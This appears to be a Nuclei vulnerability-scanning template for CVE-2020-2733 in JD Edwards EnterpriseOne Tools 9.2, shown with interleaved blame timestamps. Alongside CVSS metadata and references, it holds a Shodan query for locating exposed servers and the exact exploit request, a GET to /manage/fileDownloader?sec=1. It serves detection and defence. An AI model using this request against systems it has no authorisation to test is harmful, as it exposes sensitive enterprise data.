2022-09-21 10:10:52 +00:00
id : CVE-2020-2733
info :
2023-02-01 16:43:18 +00:00
name : JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure
2022-09-21 10:10:52 +00:00
author : DhiyaneshDk,pussycat0x
severity : critical
2022-09-21 11:29:41 +00:00
description : |
2023-02-01 16:43:18 +00:00
JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-09-21 10:10:52 +00:00
reference :
- https://redrays.io/cve-2020-2733-jd-edwards/
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-2733
2022-09-21 11:29:41 +00:00
classification :
2022-09-22 10:23:59 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-09-21 11:29:41 +00:00
cve-id : CVE-2020-2733
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
epss-score : 0.10266
2022-09-21 10:10:52 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-09-21 11:29:41 +00:00
shodan-query : port:8999 product:"Oracle WebLogic Server"
2022-09-22 10:23:59 +00:00
verified : "true"
2022-09-22 10:04:43 +00:00
tags : cve,cve2020,oracle,weblogic,disclosure,exposure
2022-09-21 10:10:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-21 10:10:52 +00:00
- method : GET
path :
- '{{BaseURL}}/manage/fileDownloader?sec=1'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'ACHCJK'
- type : word
part : header
words :
- "text/plain"
- type : status
status :
- 200
2023-02-01 16:43:18 +00:00
# Enhanced by md on 2023/02/01